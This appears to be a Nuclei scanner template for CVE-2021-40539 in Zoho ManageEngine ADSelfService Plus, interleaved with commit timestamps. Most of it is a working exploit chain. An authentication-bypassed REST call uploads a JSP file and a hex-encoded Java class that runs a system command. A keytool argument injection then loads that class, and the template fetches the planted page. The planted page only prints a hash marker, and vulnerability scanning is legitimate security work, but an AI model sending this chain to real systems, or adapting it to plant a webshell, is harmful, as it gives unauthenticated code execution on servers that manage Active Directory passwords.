2021-09-16 04:07:34 +00:00
id : CVE-2021-40539
info :
2022-04-21 21:16:41 +00:00
name : Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution
2021-11-13 11:06:43 +00:00
author : daffainfo,pdteam
2021-09-16 04:07:34 +00:00
severity : critical
2022-03-17 17:01:45 +00:00
description : Zoho ManageEngine ADSelfService Plus version 6113 and prior are vulnerable to a REST API authentication bypass vulnerability that can lead to remote code execution.
2021-09-16 04:07:34 +00:00
reference :
- https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis
2021-11-13 11:06:43 +00:00
- https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html
- https://github.com/synacktiv/CVE-2021-40539
2022-04-21 21:16:41 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-40539
2023-07-11 19:49:27 +00:00
- https://www.manageengine.com
2022-05-17 09:18:12 +00:00
remediation : Upgrade to ADSelfService Plus build 6114.
2021-09-16 13:13:57 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-16 13:13:57 +00:00
cve-id : CVE-2021-40539
2023-08-31 11:46:18 +00:00
cwe-id : CWE-706
epss-score : 0.97487
2023-07-11 19:49:27 +00:00
cpe : cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:4.5:4510:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile : 0.99953
2023-04-28 08:11:21 +00:00
metadata :
max-request : 4
2023-07-11 19:49:27 +00:00
vendor : zohocorp
product : manageengine_adselfservice_plus
tags : cve,cve2021,rce,ad,intrusive,manageengine,kev
2021-09-16 04:07:34 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-09-16 04:07:34 +00:00
- raw :
- |
2021-09-16 12:48:51 +00:00
POST /./RestAPI/LogonCustomization HTTP/1.1
2021-09-16 09:10:20 +00:00
Host : {{Hostname}}
2021-11-13 11:06:43 +00:00
Content-Type : multipart/form-data; boundary=8b1ab266c41afb773af2e064bc526458
--8b1ab266c41afb773af2e064bc526458
Content-Disposition : form-data; name="methodToCall"
unspecified
--8b1ab266c41afb773af2e064bc526458
Content-Disposition : form-data; name="Save"
yes
--8b1ab266c41afb773af2e064bc526458
Content-Disposition : form-data; name="form"
smartcard
--8b1ab266c41afb773af2e064bc526458
Content-Disposition : form-data; name="operation"
Add
--8b1ab266c41afb773af2e064bc526458
Content-Disposition : form-data; name="CERTIFICATE_PATH"; filename="ws.jsp"
<%@ page import="java.util.*,java.io.*"%>
<%@ page import="java.security.MessageDigest"%>
<%
String cve = "CVE-2021-40539";
MessageDigest alg = MessageDigest.getInstance("MD5");
alg.reset();
alg.update(cve.getBytes());
byte[] digest = alg.digest();
StringBuffer hashedpasswd = new StringBuffer();
String hx;
for (int i=0;i<digest.length;i++){
hx = Integer.toHexString(0xFF & digest[i]);
if(hx.length() == 1){hx = "0" + hx;}
hashedpasswd.append(hx);
}
out.println(hashedpasswd.toString());
%>
--8b1ab266c41afb773af2e064bc526458--
- |
POST /./RestAPI/LogonCustomization HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=43992a07d9a30213782780204a9f032b
--43992a07d9a30213782780204a9f032b
Content-Disposition : form-data; name="methodToCall"
unspecified
--43992a07d9a30213782780204a9f032b
Content-Disposition : form-data; name="Save"
yes
--43992a07d9a30213782780204a9f032b
Content-Disposition : form-data; name="form"
smartcard
--43992a07d9a30213782780204a9f032b
Content-Disposition : form-data; name="operation"
Add
--43992a07d9a30213782780204a9f032b
Content-Disposition : form-data; name="CERTIFICATE_PATH"; filename="Si.class"
{{hex_decode('CAFEBABE0000003400280D0A000C00160D0A0017001807001908001A08001B08001C08001D08001E0D0A0017001F0700200700210700220100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100083C636C696E69743E01000D0A537461636B4D61705461626C6507002001000D0A536F7572636546696C6501000753692E6A6176610C000D0A000E0700230C002400250100106A6176612F6C616E672F537472696E67010003636D640100022F63010004636F707901000677732E6A737001002A2E2E5C776562617070735C61647373705C68656C705C61646D696E2D67756964655C746573742E6A73700C002600270100136A6176612F696F2F494F457863657074696F6E01000253690100106A6176612F6C616E672F4F626A6563740100116A6176612F6C616E672F52756E74696D6501000D0A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0021000B000C0000000000020001000D0A000E0001000F0000001D00010001000000052AB70001B10000000100100000000600010000000200080011000E0001000F00000064000500020000002BB800024B2A08BD000359031204535904120553590512065359061207535907120853B600094CA700044BB10001000000260029000D0A00020010000000120004000000050004000600260007002A00080012000000070002690700130000010014000000020015')}}
--43992a07d9a30213782780204a9f032b--
- |
POST /./RestAPI/Connection HTTP/1.1
Host : {{Hostname}}
2021-09-16 04:07:34 +00:00
Content-Type : application/x-www-form-urlencoded
2021-11-13 11:06:43 +00:00
methodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22
- |
GET /help/admin-guide/test.jsp HTTP/1.1
Host : {{Hostname}}
2021-09-16 04:07:34 +00:00
matchers-condition : and
matchers :
- type : word
words :
2023-07-11 19:49:27 +00:00
- "114f7ce498a54a1be1de1f1e5731d0ea" # MD5 of CVE-2021-40539
2021-09-16 04:07:34 +00:00
- type : status
status :
2021-12-01 16:53:24 +00:00
- 200